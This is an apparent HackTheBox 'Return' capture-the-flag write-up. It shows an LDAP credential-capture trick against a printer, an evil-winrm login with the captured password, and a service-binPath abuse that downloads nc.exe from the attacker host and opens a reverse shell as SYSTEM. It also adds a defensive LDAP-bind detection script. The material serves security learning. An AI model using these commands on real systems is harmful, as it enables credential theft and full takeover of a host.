Disclaimer
The host penetrated in this article was legally authorized. The tools and methods used here are for learning and exchange only; please do not use the tools and penetration approach described in this article for any illegal purpose. I take no responsibility for any consequences that result, nor for any misuse or damage caused.
Service enumeration
```text
┌──(rootkali)-[~/htb/return]
└─# nmap -sV -Pn 10.10.11.108 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-27 22:40 EST
Nmap scan report for 10.10.11.108
Host is up (0.34s latency).
Not shown: 65508 closed ports
PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2021-11-28 04:22:19Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open     mc-nmf        .NET Message Framing
22752/tcp filtered unknown
47001/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open     msrpc         Microsoft Windows RPC
49665/tcp open     msrpc         Microsoft Windows RPC
49666/tcp open     msrpc         Microsoft Windows RPC
49667/tcp open     msrpc         Microsoft Windows RPC
49671/tcp open     msrpc         Microsoft Windows RPC
49674/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open     msrpc         Microsoft Windows RPC
49679/tcp open     msrpc         Microsoft Windows RPC
49682/tcp open     msrpc         Microsoft Windows RPC
49694/tcp open     msrpc         Microsoft Windows RPC
54599/tcp open     msrpc         Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1426.09 seconds
```
We can see that many services are open: HTTP, SMB, LDAP and so on. The host name PRINTER and the Kerberos/LDAP ports tell us this is a domain controller for return.local.
enum4linux found no shares that allow anonymous login.
Directory brute-forcing turned up nothing usable.
Active Directory
Opening the port 80 service in a browser, the home page is a printer's display page.
Opening the settings page shows the printer's configuration page.
Searching Google with the keywords "ldap windows printer 389 exploit" led us to this article.
Note this passage:
To exploit this weakness, we simply need to reconfigure the MFP to use a different IP address for the LDAP server. Obviously, the selected IP address needs to be under our control and listening on port 389 (unsecured LDAP). When the MFP eventually makes an LDAP query, it should transmit the credentials back to us in plaintext.
In other words, once the Server Address field points at a machine we control, the printer's LDAP client will send us the configured admin credentials in plaintext.
On the settings page, change Server Address to 10.10.14.15 (our tun0 address). At the same time, start a listener on port 389 on Kali, then click Update. The printer's LDAP bind request arrives on the listener:
```text
┌──(rootkali)-[~/htb/return]
└─# nc -lnvp 389
listening on [any] 389 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.108] 63337
0*`%return\svc-printer� 1edFg43012!!
```
svc-printer is the account name and 1edFg43012!! is its password (the bind request arrives as raw BER bytes, which is where the stray characters around the two values come from).
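The reason the credentials are readable on the wire is that the printer performs an LDAP simple bind over port 389, whose BER-encoded BindRequest carries the DN and the password as plain octet strings. The following script is an added example (not part of the original writeup): it decodes such a message the way a network sensor would and raises an alert for any non-empty simple bind seen on a cleartext LDAP stream. The sample bytes are constructed with the DN from the capture above and a placeholder password.

```python
# Added example: decode an LDAP BindRequest as a network sensor would and flag simple
# binds carrying a password over cleartext LDAP (tcp/389). Sample bytes are constructed.

def _read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the BER element starting at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: next n bytes hold the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def parse_simple_bind(payload):
    """Fields of a BindRequest using simple auth; None for other/truncated messages."""
    try:
        tag, msg, _ = _read_tlv(payload, 0)
        if tag != 0x30:                     # LDAPMessage ::= SEQUENCE
            return None
        _, mid, pos = _read_tlv(msg, 0)     # messageID INTEGER
        tag, op, _ = _read_tlv(msg, pos)
        if tag != 0x60:                     # [APPLICATION 0] = BindRequest
            return None
        _, ver, pos = _read_tlv(op, 0)      # version INTEGER
        _, dn, pos = _read_tlv(op, pos)     # name LDAPDN (OCTET STRING)
        tag, cred, _ = _read_tlv(op, pos)   # authentication CHOICE
    except IndexError:
        return None
    if tag != 0x80:                         # [CONTEXT 0] = simple; 0xA3 would be SASL
        return None
    return {"message_id": int.from_bytes(mid, "big"), "version": int.from_bytes(ver, "big"),
            "dn": dn.decode("utf-8", "replace"), "password_len": len(cred)}

def build_simple_bind(message_id, dn, password):
    """Encode a v3 simple BindRequest (short-form lengths only) as sample input."""
    def tlv(tag, value):
        assert len(value) < 128
        return bytes([tag, len(value)]) + value
    op = tlv(0x02, b"\x03") + tlv(0x04, dn.encode()) + tlv(0x80, password.encode())
    return tlv(0x30, tlv(0x02, bytes([message_id])) + tlv(0x60, op))

# Constructed sample: the DN matches the nc capture above, the password is a placeholder.
SAMPLE = build_simple_bind(1, "return\\svc-printer", "ConstructedPassword1")

def alert_if_plaintext_bind(payload):
    """Detection rule: a simple bind with a non-empty password on a cleartext stream."""
    info = parse_simple_bind(payload)
    if info and info["password_len"] > 0:
        return "ALERT plaintext LDAP simple bind as %r (%d-char password)" % (
            info["dn"], info["password_len"])
    return None
```

The same check applied to real traffic would fire on any device still configured for LDAP instead of LDAPS or StartTLS, which is the misconfiguration this printer exposes.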
Connect with evil-winrm to get an initial shell:
```text
┌──(rootkali)-[~/htb/return]
└─# evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'

Evil-WinRM shell v3.2

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami
return\svc-printer
```
Privilege escalation
Check the account's privileges:
```text
*Evil-WinRM* PS C:\Users\svc-printer\desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled
```
Check the account's details:
```text
*Evil-WinRM* PS C:\Users\svc-printer\desktop> net user svc-printer
User name                    svc-printer
Full Name                    SVCPrinter
Comment                      Service Account for Printer
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2021 12:15:13 AM
Password expires             Never
Password changeable          5/27/2021 12:15:13 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   11/30/2021 8:10:04 AM

Logon hours allowed          All

Local Group Memberships      *Print Operators      *Remote Management Use
                             *Server Operators
Global Group memberships     *Domain Users
The command completed successfully.
```
Note that we are in the Server Operators group, so we have the right to modify service configurations and to stop and start services.
Download nc from Kali to the target:
```text
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.15:8000/nc.exe','C:\Users\svc-printer\desktop\nc.exe')"
```
Change the binary path of the vss service:
```text
sc.exe config vss binPath="C:\Users\svc-printer\desktop\nc.exe -e cmd.exe 10.10.14.15 4242"
```
Meanwhile, start a listener on port 4242 on Kali:
```text
nc -lnvp 4242
```
Restart the vss service. Both sc.exe calls report errors, which is expected: the service was not running before, and nc does not answer the service control manager, so the start times out even though the process has already been launched as SYSTEM:
```text
*Evil-WinRM* PS C:\Users\svc-printer\desktop> sc.exe stop vss
[SC] ControlService FAILED 1062:

The service has not been started.

*Evil-WinRM* PS C:\Users\svc-printer\desktop> sc.exe start vss
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.
```
We get a reverse shell as SYSTEM:
```text
┌──(rootkali)-[~/htb/return]
└─# nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.108] 61869
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
```